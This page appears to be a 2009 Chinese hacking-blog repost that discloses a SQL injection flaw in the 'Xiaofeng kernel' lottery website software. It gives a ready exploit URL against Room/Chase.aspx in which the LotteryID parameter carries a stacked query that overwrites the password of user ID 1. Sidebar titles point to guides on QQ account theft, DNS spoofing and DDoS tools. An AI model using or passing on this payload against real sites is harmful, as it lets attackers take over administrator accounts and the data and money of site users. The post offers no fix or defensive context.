=波波日志 > 黑客技术 > 晓风内核 彩票整站平台程序漏洞公布=
[转]晓风内核 彩票整站平台程序漏洞公布
|
该漏洞位于 Room目录下的Chase.aspx文件,由于LotteryID 没有进行安全检查,导致注入漏洞发生。EXP如下 Room/Chase.aspx?LotteryID=28 ; update T_Users Set Password='xx' where ID=1 |
http://hi.baidu.com/isbx/blog/item/bee2d31b7ab4bdddac6e7521.html
类别:黑客技术 作者:转载 日期:2009-08-31 【评论:0】
相关文章
暂时没有评论!
发表留言
热门博文
- 翻墙软件组合:FireFox+Tor+FoxyProxy (高度匿名Tor)
- 翻墙工具下载地址
- 悲剧,translate.google.cn也被墙了
- DDoS攻击使用的常用工具
- QQ输入状态漏洞,让你的好友死在温柔的问候中
- 关于adodb.stream的"错误: Automation 服务器不能创建对象"解决方法
最新博文
随机博文
- QQ盗号的核心技术(简单版)
- DNS欺骗技术教程
- 突破IIS防火墙实现注入的方法
- Microsoft Internet Infomation Server 6.0 ISAPI Filename Analytic Vulnerability
- 解决CC攻击关键点
- 从CSDN 漏洞谈.NET 安全开发
广告商赞助
